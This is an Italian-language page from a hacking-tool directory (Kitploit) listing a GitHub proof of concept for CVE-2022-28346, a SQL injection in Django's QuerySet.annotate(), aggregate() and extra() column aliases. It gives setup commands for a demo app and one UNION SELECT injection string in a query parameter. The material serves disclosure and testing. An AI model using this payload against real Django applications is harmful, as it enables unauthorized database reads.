Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-28346 — È stato scoperto un problema in Django 2.2 prima di 2.2.28, 3.2 prima di 3.2.13 e 4.0 prima di 4.0.4. I metodi QuerySet.annotate(), aggregate() e extra() sono soggetti a injection SQL negli alias delle colonne tramite un dizionario costruito ad arte (con espansione del dizionario) passato come **kwargs. | Kitploit
Strumenti/GitHubGitHub/vincentinttsh/cve-2022-28346
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebSicurezza dei Database
GitHubvincentinttsh/cve-2022-28346

CVE-2022-28346

Vedi Repository
84 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

È stato scoperto un problema in Django 2.2 prima di 2.2.28, 3.2 prima di 3.2.13 e 4.0 prima di 4.0.4. I metodi QuerySet.annotate(), aggregate() e extra() sono soggetti a injection SQL negli alias delle colonne tramite un dizionario costruito ad arte (con espansione del dizionario) passato come **kwargs.

Condividi

CVE-2022-28346 PoC Tweet

Impatto:

  • Potenziale SQL injection in QuerySet.annotate(), aggregate() ed extra().

Installazione

root@kitploit:~
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver

PoC

root@kitploit:~
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --

poc-image

Riferimenti

CVE Mitre

Django

Scarica lo strumento